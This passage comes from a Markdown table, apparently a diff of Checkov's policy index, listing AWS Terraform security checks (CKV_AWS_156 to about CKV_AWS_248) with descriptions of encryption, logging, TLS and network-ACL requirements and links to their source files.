[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 241 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 242 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | +| 243 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 244 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | +| 245 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 246 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | +| 247 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 248 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | +| 249 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | +| 250 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | +| 251 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | +| 252 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | +| 253 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 254 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 255 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | +| 256 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 257 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | +| 258 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 259 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 260 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | +| 261 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 262 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 263 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 264 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 265 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 266 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | +| 267 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | +| 268 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | +| 269 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | +| 270 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | +| 271 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | +| 272 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | +| 273 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | +| 274 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | +| 275 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | +| 276 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 277 | CKV_AWS_187 | resource | aws_sagemaker_notebook_instance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 278 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | +| 279 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | +| 280 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | +| 281 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | +| 282 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | +| 283 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 284 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 285 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 286 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 287 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | +| 288 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | +| 289 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | +| 290 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | +| 291 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | +| 292 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | +| 293 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | +| 294 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | +| 295 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | +| 296 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | +| 297 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | +| 298 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | +| 299 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 300 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 301 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | +| 302 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | +| 303 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | +| 304 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | +| 305 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | +| 306 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | +| 307 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | +| 308 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | +| 309 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | +| 310 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | +| 311 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | +| 312 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | +| 313 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | +| 314 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | +| 315 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | +| 316 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | +| 317 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | +| 318 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 319 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 320 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | +| 321 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 322 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 323 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 324 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 325 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 326 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 327 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 328 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 329 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 330 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 331 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | +| 332 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | +| 333 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | +| 334 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | +| 335 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | +| 336 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | +| 337 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | +| 338 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | +| 339 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | +| 340 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | +| 341 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | +| 342 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | +| 343 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | +| 344 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | +| 345 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 346 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 347 | CKV_AWS_248 | resource | 